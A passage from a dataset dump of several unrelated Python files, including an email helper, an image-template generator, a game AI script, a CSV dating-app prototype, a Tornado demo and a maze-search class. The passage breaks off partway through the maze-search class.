'30分钟_倒5五笔',\n '30分钟_倒1七笔',\n '30分钟_倒2七笔',\n '30分钟_倒3七笔',\n '30分钟_倒4七笔',\n '30分钟_倒5七笔',\n '30分钟_倒1九笔',\n '30分钟_倒2九笔',\n '30分钟_倒3九笔',\n '30分钟_倒4九笔',\n '30分钟_倒5九笔',\n '60分钟_倒1方向',\n '60分钟_倒1长度',\n '60分钟_倒1涨跌幅',\n '60分钟_倒1拟合优度',\n '60分钟_倒1近五笔最高点',\n '60分钟_倒1近五笔最低点',\n '60分钟_倒1近七笔最高点',\n '60分钟_倒1近七笔最低点',\n '60分钟_倒1近九笔最高点',\n '60分钟_倒1近九笔最低点',\n '60分钟_倒1近十一笔最高点',\n '60分钟_倒1近十一笔最低点',\n '60分钟_倒1近十三笔最高点',\n '60分钟_倒1近十三笔最低点',\n '60分钟_倒1近十五笔最高点',\n '60分钟_倒1近十五笔最低点',\n '60分钟_倒2方向',\n '60分钟_倒2长度',\n '60分钟_倒2涨跌幅',\n '60分钟_倒2拟合优度',\n '60分钟_倒3方向',\n '60分钟_倒3长度',\n '60分钟_倒3涨跌幅',\n '60分钟_倒3拟合优度',\n '60分钟_倒4方向',\n '60分钟_倒4长度',\n '60分钟_倒4涨跌幅',\n '60分钟_倒4拟合优度',\n '60分钟_倒5方向',\n '60分钟_倒5长度',\n '60分钟_倒5涨跌幅',\n '60分钟_倒5拟合优度',\n '60分钟_倒1五笔',\n '60分钟_倒2五笔',\n '60分钟_倒3五笔',\n '60分钟_倒4五笔',\n '60分钟_倒5五笔',\n '60分钟_倒1七笔',\n '60分钟_倒2七笔',\n '60分钟_倒3七笔',\n '60分钟_倒4七笔',\n '60分钟_倒5七笔',\n '60分钟_倒1九笔',\n '60分钟_倒2九笔',\n '60分钟_倒3九笔',\n '60分钟_倒4九笔',\n '60分钟_倒5九笔',\n '日线_倒1方向',\n '日线_倒1长度',\n '日线_倒1涨跌幅',\n '日线_倒1拟合优度',\n '日线_倒1近五笔最高点',\n '日线_倒1近五笔最低点',\n '日线_倒1近七笔最高点',\n '日线_倒1近七笔最低点',\n '日线_倒1近九笔最高点',\n '日线_倒1近九笔最低点',\n '日线_倒1近十一笔最高点',\n '日线_倒1近十一笔最低点',\n '日线_倒1近十三笔最高点',\n '日线_倒1近十三笔最低点',\n '日线_倒1近十五笔最高点',\n '日线_倒1近十五笔最低点',\n '日线_倒2方向',\n '日线_倒2长度',\n '日线_倒2涨跌幅',\n '日线_倒2拟合优度',\n '日线_倒3方向',\n '日线_倒3长度',\n '日线_倒3涨跌幅',\n '日线_倒3拟合优度',\n '日线_倒4方向',\n '日线_倒4长度',\n '日线_倒4涨跌幅',\n '日线_倒4拟合优度',\n '日线_倒5方向',\n '日线_倒5长度',\n '日线_倒5涨跌幅',\n '日线_倒5拟合优度',\n '日线_倒1五笔',\n '日线_倒2五笔',\n '日线_倒3五笔',\n '日线_倒4五笔',\n '日线_倒5五笔',\n '日线_倒1七笔',\n '日线_倒2七笔',\n '日线_倒3七笔',\n '日线_倒4七笔',\n '日线_倒5七笔',\n '日线_倒1九笔',\n '日线_倒2九笔',\n '日线_倒3九笔',\n '日线_倒4九笔',\n '日线_倒5九笔',\n '日线笔因子',\n '日线笔结束',\n '60分钟笔因子',\n '60分钟笔结束',\n '30分钟笔因子',\n '30分钟笔结束',\n '15分钟笔因子',\n '15分钟笔结束',\n '5分钟笔结束'\n ]\n return s_name\n\n","sub_path":"czsc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"130713861","text":"import smtplib\nfrom app.src.util.html import strip_tags\nfrom threading import Thread\nfrom flask import current_app\nfrom flask_mail import Message\nfrom app import mail\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom string import Template\nfrom app.src.util.html import strip_tags\n\ndef send_async_email(app, msg):\n with app.app_context():\n mail.send(msg)\n\ndef send_sample_email(user, recipient_name, subject, template):\n html_body = popuplateContactName(template, recipient_name)\n text_body = strip_tags(html_body)\n # set up the SMTP server\n s = smtplib.SMTP(host=user.user_contact.marketing_email_host, port=user.user_contact.marketing_email_port)\n s.starttls()\n s.login(user.user_contact.marketing_email, user.user_contact.marketing_email_password)\n send_email(subject, user.user_contact.marketing_email, [user.email], text_body, html_body, smtp=s)\n # Terminate the SMTP session and close the connection\n s.quit()\n\ndef send_email(subject, sender, recipients, text_body, html_body,\n attachments=None, sync=False, smtp=None):\n\n # setup the parameters of the message\n msg = Message(subject, sender=sender, recipients=recipients)\n msg.body = text_body\n msg.html = html_body\n if attachments:\n for attachment in attachments:\n msg.attach(*attachment)\n\n #msg = MIMEMultipart('alternative')\n #msg['From']=sender.email\n #msg['To']=recipient.email\n #msg['Subject']=subject\n #part1 = MIMEText(text_body, 'plain')\n #part2 = MIMEText(html_body, 'html')\n\n # Attach parts into message container.\n # According 
to RFC 2046, the last part of a multipart message, in this case\n # the HTML message, is best and preferred.\n #msg.attach(part1)\n #msg.attach(part2)\n\n if smtp is not None:\n #send the message via the SMTP server set up earlier.\n smtp.sendmail(sender, [recipients], msg.as_string())\n elif sync:\n mail.send(msg)\n else:\n Thread(target=send_async_email,\n args=(current_app._get_current_object(), msg)).start()\n del msg\n\ndef popuplateContactName(email_template, recipient_name):\n s = Template(email_template)\n data = dict(first_name=recipient_name)\n return s.safe_substitute(data)\n","sub_path":"app/src/email/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126577475","text":"# Creates digit templates with digit randomly placed on the template\nimport os\nimport re\nimport cv2\nimport shutil\nimport random\nimport numpy as np\nfrom image_processing.constants import ROOT_DIR\n\nDATA_DIR_BACKGROUNDS = ROOT_DIR + \"\\\\data\\\\background\"\nbackgrounds = os.listdir(DATA_DIR_BACKGROUNDS)\n\nDATA_DIR_CLASSIFIERS = ROOT_DIR + \"\\\\data\\\\templates\"\ndigits = os.listdir(DATA_DIR_CLASSIFIERS)\n\nDATA_DIR_RESULTS = ROOT_DIR + \"\\\\data\\\\random_templates\"\n\n\ndef create_background(rows, columns):\n \"\"\"Creates a background to place the digits on\"\"\"\n background_number = random.randint(0, len(backgrounds) - 1)\n background = cv2.imread(str(DATA_DIR_BACKGROUNDS) + \"\\\\\" + backgrounds[background_number], 0)\n\n (values, counts) = np.unique(background, return_counts=True)\n ind = np.argmax(counts)\n\n base_array = np.tile(values[ind], (rows, columns))\n\n avg = values[ind]\n minimum = np.min(background)\n minimum = int(minimum) - int(avg)\n maximum = np.max(background)\n maximum = int(maximum) - int(avg)\n\n base_array = np.asarray(base_array + np.random.randint(minimum, maximum, (rows, columns)), dtype=np.uint8)\n base_array = cv2.GaussianBlur(base_array, (15, 15), 3)\n\n return base_array\n\n\ndef create_binary(img_digit):\n \"\"\"Creates a binary image \"\"\"\n img_digit_hsv = cv2.cvtColor(img_digit, cv2.COLOR_BGR2HSV)\n\n clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(3, 3))\n channels = cv2.split(img_digit_hsv)\n img_digit_value = clahe.apply(channels[2])\n\n img_digit_value_normalized = cv2.normalize(img_digit_value, None, -1, 1, cv2.NORM_MINMAX, cv2.CV_32F)\n img_digit_binary = cv2.inRange(img_digit_value_normalized, -1, .5)\n\n return img_digit_binary\n\n\ndef find_contour_digit(img_binary):\n \"\"\"Get the biggest region from the binary image\"\"\"\n contours, hir = cv2.findContours(img_binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt = [contours[max_index]]\n\n x, y, w, h = cv2.boundingRect(contours[max_index])\n\n # Create mask to draw the contour on\n (W, H) = img_binary.shape[:2]\n cnt_canvas = np.zeros((W, H), np.uint8)\n cv2.drawContours(cnt_canvas, cnt, -1, 1, -1)\n\n return cnt_canvas, x, y, w, h\n\n\ndef create_digit_masks(img_digit):\n \"\"\"Creates a mask of the digit\"\"\"\n img_digit_binary = create_binary(img_digit)\n img_digit_gray = cv2.cvtColor(img_digit, cv2.COLOR_BGR2GRAY)\n\n mask_digit, x, y, w, h = find_contour_digit(img_digit_binary)\n img_digit_gray *= mask_digit\n\n img_digit_gray[img_digit_gray > 250] = 0\n mask_digit *= img_digit_gray\n mask_digit[mask_digit > 0] = 1\n\n return mask_digit[y:y + h, x:x + w], img_digit_gray[y:y + 
h, x:x + w]\n\n\ndef place_digits(background, H, W):\n \"\"\"Randomly places the digits on a background\"\"\"\n # Digit selection\n random_number = random.randint(0, len(digits) - 1) # generate random int\n img_loc = str(DATA_DIR_CLASSIFIERS) + \"\\\\\" + digits[random_number] # use random int to load a template\n img_first_digit = cv2.imread(img_loc)\n img_first_digit = cv2.resize(img_first_digit, (H, W))\n\n mask_first_digit, img_first_digit_gray = create_digit_masks(img_first_digit) # create masks of the digit\n\n # Addition of the second digit based on the digit that was chosen before\n pattern = r\"([0-9]).*.jpg\"\n name = re.findall(pattern, digits[random_number]) # digit is specified in the file name\n\n if int(name[0]) is 9:\n second_digit = 0\n else:\n second_digit = int(name[0]) + 1\n\n img_loc = str(DATA_DIR_CLASSIFIERS) + \"\\\\\" + str(second_digit) + \".jpg\"\n img_second_digit = cv2.imread(img_loc)\n img_second_digit = cv2.resize(img_second_digit, (H, W))\n\n mask_second_digit, img_second_digit_gray = create_digit_masks(img_second_digit) # create masks of the digit\n\n # Use both maks and images of the digits to combine them in two arrays comparable to the representation in the \\\n # tally counter\n\n height_first_digit, width_first_digit = mask_first_digit.shape[:2]\n height_second_digit, width_second_digit = mask_second_digit.shape[:2]\n\n # Resize the digit so that they have equal heights\n ratio_between_digits = height_first_digit / height_second_digit\n height_second_digit = height_first_digit\n width_second_digit *= ratio_between_digits\n width_second_digit = int(width_second_digit)\n\n mask_second_digit = cv2.resize(mask_second_digit, (width_second_digit, height_second_digit)) * 0\n img_second_digit_gray = cv2.resize(img_second_digit_gray, (width_second_digit, height_second_digit)) * 0\n\n # Pad the smallest array with zeros for the concatenation of arrays\n if width_first_digit is width_second_digit:\n buffer = np.zeros((int(height_first_digit * .25), width_first_digit), np.uint8) # Spacing between digits\n elif width_first_digit > width_second_digit:\n padding_mask = np.zeros((height_first_digit, width_first_digit), np.uint8)\n padding_img = np.zeros((height_first_digit, width_first_digit), np.uint8)\n buffer = np.zeros((int(height_first_digit * .25), width_first_digit), np.uint8)\n if np.abs(width_first_digit - width_second_digit) > 2:\n start_pos = int((np.abs(width_first_digit - width_second_digit) / 2) - 1)\n else:\n start_pos = 0\n\n # Addition of the smallest digit arrays in the center of the padding arrays\n padding_mask[:, start_pos:start_pos + width_second_digit] = mask_second_digit\n mask_second_digit = padding_mask\n padding_img[:, start_pos:start_pos + width_second_digit] = img_second_digit_gray\n img_second_digit_gray = padding_img\n\n else:\n padding_mask = np.zeros((height_second_digit, width_second_digit), np.uint8)\n padding_img = np.zeros((height_second_digit, width_second_digit), np.uint8)\n buffer = np.zeros((int(height_second_digit * .25), width_second_digit), np.uint8)\n if np.abs(width_first_digit - width_second_digit) > 2:\n start_pos = int((np.abs(width_first_digit - width_second_digit) / 2) - 1)\n else:\n start_pos = 0\n\n padding_mask[:, start_pos:start_pos + width_first_digit] = mask_first_digit\n mask_first_digit = padding_mask\n padding_img[:, start_pos:start_pos + width_first_digit] = img_first_digit_gray\n img_first_digit_gray = padding_img\n\n # Concatenation of the array containing the digit arrays\n mask_digits = 
np.concatenate([mask_first_digit, buffer, mask_second_digit])\n img_digits = np.concatenate([img_first_digit_gray, buffer, img_second_digit_gray])\n\n # Placement of the digits on the generated background\n height, width = img_digits.shape[:2]\n height_background, width_background = background.shape[:2]\n\n # random selection of x and y for the digits to be placed\n random_x = random.randint(-int(width_background * .5), int(width_background * .5))\n random_y = random.randint(-int(height_background * .5), int(height_background* .75))\n\n if random_y < 0: # if the random y is below 0 part of the top of the digits is cut off\n mask_digits = mask_digits[-random_y:height, :]\n img_digits = img_digits[-random_y:height, :]\n height, width = img_digits.shape[:2]\n random_y = 0\n\n if random_x < 0:\n mask_digits = mask_digits[:, -random_x:width]\n img_digits = img_digits[:, -random_x:width]\n height, width = img_digits.shape[:2]\n random_x = 0\n\n if random_x + width <= width_background and random_y + height <= height_background:\n background[random_y:random_y + height, random_x:random_x + width] = background[random_y:random_y + height,\n random_x:random_x + width]\\\n * (1 - mask_digits)\n background[random_y:random_y + height, random_x:random_x + width] += img_digits\n\n elif random_x + width > width_background and random_y + height > height_background:\n background[\n random_y: height_background,\n random_x: width_background] = background[\n random_y: height_background,\n random_x: width_background] * (1 - mask_digits)[\n 0:(height_background - random_y),\n 0:(width_background - random_x)\n ]\n\n background[random_y:height_background, random_x:width_background] += img_digits[\n 0:(height_background - random_y),\n 0:(width_background - random_x)]\n elif random_x + width > width_background:\n background[random_y:random_y + height, random_x:width_background] = background[\n random_y:random_y + height,\n random_x:width_background\n ] * (1 - mask_digits)[\n :,\n 0:(width_background - random_x)\n ]\n background[random_y:random_y + height, random_x:width_background] += img_digits[\n :, 0:(width_background - random_x)]\n else:\n background[random_y:height_background, random_x:random_x + width] = background[\n random_y:height_background,\n random_x:random_x + width\n ] * (1 - mask_digits)[\n 0:(height_background - random_y),\n :\n ]\n background[random_y:height_background, random_x:random_x + width] += img_digits[\n 0:(height_background - random_y),\n :]\n\n background = cv2.GaussianBlur(background, (3, 3), 3)\n return background, name\n\n\nif __name__ == '__main__':\n # Run the script to generate the templates\n Y = 250\n X = 150\n\n if os.path.exists(DATA_DIR_RESULTS):\n shutil.rmtree(DATA_DIR_RESULTS)\n os.mkdir(DATA_DIR_RESULTS)\n else:\n os.mkdir(DATA_DIR_RESULTS)\n\n for i in range(100):\n base_array = create_background(Y, X)\n result, digit = place_digits(base_array, int(X * .75), int(Y * .75))\n\n cv2.imwrite(str(DATA_DIR_RESULTS) + \"//\" + digit[0] + \"_iteration_\" + str(i) + \".jpg\", result)\n","sub_path":"image_processing/digit/digit_templates/random_digit_templates.py","file_name":"random_digit_templates.py","file_ext":"py","file_size_in_byte":11388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"83037377","text":"import App\ndef CreateAI(pShip):\n\t#########################################\n\t# Creating PlainAI Call_VentureTakingDamage at (112, 188)\n\tpCall_VentureTakingDamage = App.PlainAI_Create(pShip, 
\"Call_VentureTakingDamage\")\n\tpCall_VentureTakingDamage.SetScriptModule(\"RunScript\")\n\tpCall_VentureTakingDamage.SetInterruptable(1)\n\tpScript = pCall_VentureTakingDamage.GetScriptInstance()\n\tpScript.SetScriptModule(\"Maelstrom.Episode6.E6M1.E6M1\")\n\tpScript.SetFunction(\"VentureTakingDamage\")\n\t# Done creating PlainAI Call_VentureTakingDamage\n\t#########################################\n\t#########################################\n\t# Creating ConditionalAI HullTakingDamage at (114, 265)\n\t## Conditions:\n\t#### Condition HullAt80\n\tpHullAt80 = App.ConditionScript_Create(\"Conditions.ConditionSystemBelow\", \"ConditionSystemBelow\", pShip.GetName(), App.CT_HULL_SUBSYSTEM, 0.50)\n\t## Evaluation function:\n\tdef EvalFunc(bHullAt80):\n\t\tACTIVE = App.ArtificialIntelligence.US_ACTIVE\n\t\tDORMANT = App.ArtificialIntelligence.US_DORMANT\n\t\tDONE = App.ArtificialIntelligence.US_DONE\n\t\tif (bHullAt80):\n\t\t\treturn ACTIVE\n\t\treturn DORMANT\n\t## The ConditionalAI:\n\tpHullTakingDamage = App.ConditionalAI_Create(pShip, \"HullTakingDamage\")\n\tpHullTakingDamage.SetInterruptable(1)\n\tpHullTakingDamage.SetContainedAI(pCall_VentureTakingDamage)\n\tpHullTakingDamage.AddCondition(pHullAt80)\n\tpHullTakingDamage.SetEvaluationFunction(EvalFunc)\n\t# Done creating ConditionalAI HullTakingDamage\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack4Galor6 at (127, 77)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack4Galor6 = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 6\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack4Galor6\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack4Galor5 at (213, 78)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack4Galor5 = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 5\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack4Galor5\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack4RemainingTargets at (307, 81)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack4RemainingTargets = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 7\", \"Keldon 2\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack4RemainingTargets\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI FirstWaveTargets at (227, 260)\n\tpFirstWaveTargets = App.PriorityListAI_Create(pShip, \"FirstWaveTargets\")\n\tpFirstWaveTargets.SetInterruptable(1)\n\t# SeqBlock is at (221, 177)\n\tpFirstWaveTargets.AddAI(pBasicAttack4Galor6, 1)\n\tpFirstWaveTargets.AddAI(pBasicAttack4Galor5, 2)\n\tpFirstWaveTargets.AddAI(pBasicAttack4RemainingTargets, 3)\n\t# Done creating PriorityListAI FirstWaveTargets\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack3Galors at (406, 114)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack3Galors = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 8\", \"Galor 9\", \"Galor 13\", \"Galor 14\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack3Galors\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack3Keldon at (511, 113)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack3Keldon = AI.Compound.BasicAttack.CreateAI(pShip, \"Keldon 3\", \"Keldon 21\", \"Keldon 22\", Difficulty = 0.65)\n\t# Done 
creating CompoundAI BasicAttack3Keldon\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI SecondWaveTargets at (340, 254)\n\tpSecondWaveTargets = App.PriorityListAI_Create(pShip, \"SecondWaveTargets\")\n\tpSecondWaveTargets.SetInterruptable(1)\n\t# SeqBlock is at (462, 204)\n\tpSecondWaveTargets.AddAI(pBasicAttack3Galors, 1)\n\tpSecondWaveTargets.AddAI(pBasicAttack3Keldon, 2)\n\t# Done creating PriorityListAI SecondWaveTargets\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI PriorityList at (109, 350)\n\tpPriorityList = App.PriorityListAI_Create(pShip, \"PriorityList\")\n\tpPriorityList.SetInterruptable(1)\n\t# SeqBlock is at (241, 357)\n\tpPriorityList.AddAI(pHullTakingDamage, 1)\n\tpPriorityList.AddAI(pFirstWaveTargets, 2)\n\tpPriorityList.AddAI(pSecondWaveTargets, 3)\n\t# Done creating PriorityListAI PriorityList\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (17, 355)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pPriorityList)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Maelstrom/Episode6/E6M1/E6M1_AI_Venture_Ona.py","file_name":"E6M1_AI_Venture_Ona.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"350307867","text":"import csv\n\nglobal strengthslist\nstrengthslist=[\"patience\",\"efficiency\",\"sensitivity\",\"frankness\",\"submissiveness\",\"leadership\",\"timekeeping\",\"laidback\"]\n\ndef mainmenu():\n while True:\n print(\"\"\"\n ============MAIN MENU================\n *Find the love of your life*\n 1. Register\n 2. Login\n 3. 
Quit\n \"\"\")\n \n x=input(\"Enter choice:\")\n if int(x)==1:\n register()\n break\n elif int(x)==2:\n login()\n break\n elif int(x)==3:\n print(\"Goodbye then!\")\n break\n \n\ndef register():\n print(\"===Register====\")\n print(\"First things first, sign up and tell us a little about yourself\")\n with open(\"dating.txt\",\"a\") as fo: \n writer=csv.writer(fo) \n firstname=input(\"Enter first name:\")\n lastname=input(\"Enter last name:\")\n username=firstname+lastname[0]+\"bird\"\n print(\"Your automatically generated username is:\",username)\n password=input(\"Enter password:\")\n gender=input(\"Enter gender\")\n email=input(\"Enter email:\")\n dob=input(\"Enter date of birth in format dd/mm/yy:\")\n beliefs=input(\"Enter beliefs\")\n strengthslist=[\"patience\",\"efficiency\",\"sensitivity\",\"frankness\",\"submissiveness\",\"leadership\",\"timekeeping\",\"laidback\"]\n print(strengthslist)\n strengths=input(\"Enter your top strength: (select from the above list)\")\n contactcount=0\n writer.writerow([username,password,firstname,lastname,gender,email,dob,beliefs,strengths,contactcount])\n print(\"written to file\")\n mainmenu()\n\n\ndef login():\n print(\"===Welcome to the Dating System prototype====\")\n global notloggedin\n notloggedin=True \n\n while notloggedin==True: \n with open(\"dating.txt\",\"r\") as f:\n username=input(\"Enter username:\")\n password=input(\"Enter password:\")\n reader=csv.reader(f)\n for row in reader:\n for field in row:\n if field==username and row[1]==password:\n notloggedin=False\n else:\n break\n if notloggedin==True: \n print(\"Try again\")\n else:\n print(\"=====Access Granted! Ready to date?!======\")\n profile(username)\n\ndef profile(username):\n print()\n print()\n print(\"------Welcome to your profile---------\")\n print()\n print()\n with open(\"dating.txt\",newline=\"\") as f:\n reader=list(csv.reader(f))\n temporarylist=enumerate(reader)\n for idx, row in temporarylist:\n for field in row:\n if field==username:\n username_index = idx\n print(username_index)\n print(\"Welcome,\",field)\n wavedcount=int(reader[username_index][9])\n print(\"Waved at:\",wavedcount)\n waved=int(input(\"How many potential dates have you waved at this week?\"))\n wavedcount=wavedcount+waved\n print(\"Waved-at count:\",waved)\n ##ADDING ABILITY TO UPDATE contactcount variable in the file\n temporarylist=[]\n updatedlist=[]\n with open(\"dating.txt\",newline=\"\") as f:\n reader=list(csv.reader(f))\n temporarylist=reader #store copy of the file contents here\n for row in reader: #for every row in the file\n for field in row:\n if field==username:\n updatedlist.append(row)\n updatedlist[0][9]=int(updatedlist[0][9])+waved\n updatecontactcount(updatedlist,temporarylist)\n\ndef updatecontactcount(updatedlist,temporarylist):\n for index, row in enumerate(temporarylist):\n for field in row:\n if field==updatedlist[0]:\n temporarylist[index]=updatedlist #replace old record with updated records\n with open(\"dating.txt\",\"w\",newline=\"\") as f:\n Writer=csv.writer(f)\n Writer.writerows(temporarylist)\n print(\"File has been updated\")\n print(\"People you have waved at:\",updatedlist[0][9])\n print(\"-------What next?-----------\") \n choice=input(\"Enter S to start searching or M if you want us to find you a match!\")\n if choice==\"s\" or choice==\"S\":\n search()\n elif choice==\"M\" or choice==\"m\":\n matchmagic()\n \ndef search(): \n print(\"====Search Menu======\")\n print(\"\"\"\n 1. Search by Gender\n 2. Search by Date\n 3. Search by key word\n 4. 
Return to Main Menu\n \"\"\")\n choice=input(\"What would you like to do?:\")\n if int(choice)==1:\n gender()\n elif int(choice)==2:\n date()\n elif int(choice)==3:\n keyword()\n elif int(choice)==4:\n mainmenu()\n\ndef gender():\n print(\"==Search by Gender==\")\n with open(\"dating.txt\",\"r\") as f: \n gender=input(\"Enter the gender you are looking for:\")\n reader=csv.reader(f)\n for row in reader:\n for field in row:\n if field==gender:\n print(row)\n \n search()\n\ndef keyword():\n wordfound=False\n print(\"===Search by Key word===\")\n while wordfound==False: \n with open(\"dating.txt\",\"r\") as f:\n keyword=input(\"Enter keyword:\")\n reader=csv.reader(f)\n for row in reader:\n for field in row:\n if field==keyword:\n print(row)\n wordfound=True \n search()\n\ndef date():\n pass \n\ndef matchmagic():\n wordfound=False\n print(\"===Creating Match===\")\n while wordfound==False: \n with open(\"dating.txt\",\"r\") as f:\n keystrength=input(\"Enter one of your key strengths:\")\n print()\n print()\n print(\"Printing potential --true love-- matches!\")\n reader=csv.reader(f)\n for row in reader:\n if row[8] != keystrength: \n print(row)\n wordfound=True\n \n search()\n \nmainmenu()\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"154557697","text":"import tornado.httpserver\r\nimport tornado.ioloop\r\nimport tornado.options\r\nimport tornado.web\r\n\r\nfrom tornado.options import define,options\r\n\r\ndefine('port',default=8000,help='run port',type=int)\r\n\r\nclass IndexHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render('01index.html')\r\n\r\n def post(self):\r\n username = self.get_argument('name','no')\r\n passwd = self.get_argument('password','no')\r\n self.render('02tmep_index.html',username=username)\r\n\r\nclass TempHandler(tornado.web.RequestHandler):\r\n def haha(self):\r\n return '这里是tornado'\r\n\r\n def get(self):\r\n username = self.get_argument('name','no')\r\n import time\r\n li = ['a','b','c','d']\r\n self.render('02tmep_index.html',\r\n username=username,\r\n time=time,\r\n haha=self.haha,\r\n li=li\r\n )\r\n\r\n\r\nif __name__ == '__main__':\r\n tornado.options.parse_command_line()\r\n\r\n app = tornado.web.Application(\r\n handlers=[\r\n (r'/index',IndexHandler),\r\n (r'/temp',TempHandler),\r\n ],\r\n template_path='templates',\r\n static_path='static',\r\n debug=True,\r\n )\r\n http_server = tornado.httpserver.HTTPServer(app)\r\n http_server.listen(options.port)\r\n tornado.ioloop.IOLoop.instance().start()","sub_path":"tornado/lesson/03templates.py","file_name":"03templates.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"63364060","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. 
It cannot contain any loops.\n'''\ndef count_th(word):\n count = 0\n if word == '':\n return count\n # check if first letter is t\n ## check is second is h\n elif word[0] == 't' and len(word) >= 2 and word[1] == 'h':\n ## increment count\n count += 1\n new_word = word.replace(word[0] + word[1], '', 1)\n count += count_th(new_word)\n # remove first letter from word and call count_th(word)\n else:\n new_word = word.replace(word[0], '', 1)\n count += count_th(new_word)\n\n return count\n","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"52870887","text":"from math import sqrt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.model_selection import train_test_split\nfrom csv import reader\nfrom math import sqrt\nimport random\nimport pygame\nimport random\nimport sys\nimport math\nfrom collections import deque\nfrom queue import LifoQueue\n\n\n\n\n# region SearchAlgorithms\nclass Node:\n id = None # Unique value for each node.\n up = None # Represents value of neighbors (up, down, left, right).\n down = None\n left = None\n right = None\n previousNode = None # Represents value of neighbors.\n\n def __init__(self, value):\n self.value = value\n\n\nclass SearchAlgorithms:\n ''' * DON'T change Class, Function or Parameters Names and Order\n * You can add ANY extra functions,\n classes you need as long as the main\n structure is left as is '''\n path = [] # Represents the correct path from start node to the goal node.\n fullPath = [] # Represents all visited nodes from the start node to the goal node.\n\n maze = \"\"\n rows_num = 1\n columns_num = 0\n\n def __init__(self, mazeStr):\n ''' mazeStr contains the full board\n The board is read row wise,\n the nodes are numbered 0-based starting\n the leftmost node'''\n self.maze = mazeStr\n\n def convert_to_2Darray(self):\n for i in range(len(self.maze)):\n if (self.maze[i] == ' '):\n self.rows_num += 1\n for i in range(len(self.maze)):\n if (self.maze[i] == ' '):\n break\n if (self.maze[i] != ','):\n self.columns_num += 1\n\n arr2D = np.array([[str(j) for j in i.split(',')] for i in self.maze.split(' ')])\n\n return arr2D\n\n def create_nodes(self):\n\n arr = self.convert_to_2Darray()\n\n node_list = []\n\n for i in range(self.rows_num):\n row = []\n for j in range(self.columns_num):\n nod = Node(0)\n row.append(nod)\n node_list.append(row)\n\n for i in range(self.rows_num):\n for j in range(self.columns_num):\n node_list[i][j].value = arr[i][j]\n\n counter2 = 0\n\n for i in range(self.rows_num):\n for j in range(self.columns_num):\n node_list[i][j].id = counter2\n counter2 += 1\n\n for i in range(self.rows_num):\n for j in range(self.columns_num):\n\n if (j == 0):\n node_list[i][j].left = None\n else:\n node_list[i][j].left = node_list[i][j - 1].id\n if (i == 0):\n node_list[i][j].up = None\n else:\n node_list[i][j].up = node_list[i - 1][j].id\n if (i == self.rows_num - 1):\n node_list[i][j].down = None\n else:\n node_list[i][j].down = node_list[i + 1][j].id\n if (j == self.columns_num - 1):\n node_list[i][j].right = None\n else:\n node_list[i][j].right = node_list[i][j + 1].id\n return node_list\n\n def DFS(self):\n node_list_maze = self.create_nodes()\n stack = []\n i = 0\n j = 0\n start_position = node_list_maze[0][0]\n node_list_maze[0][0].previousNode = -1\n\n stack.append(start_position)\n while len(stack) != 0:\n 
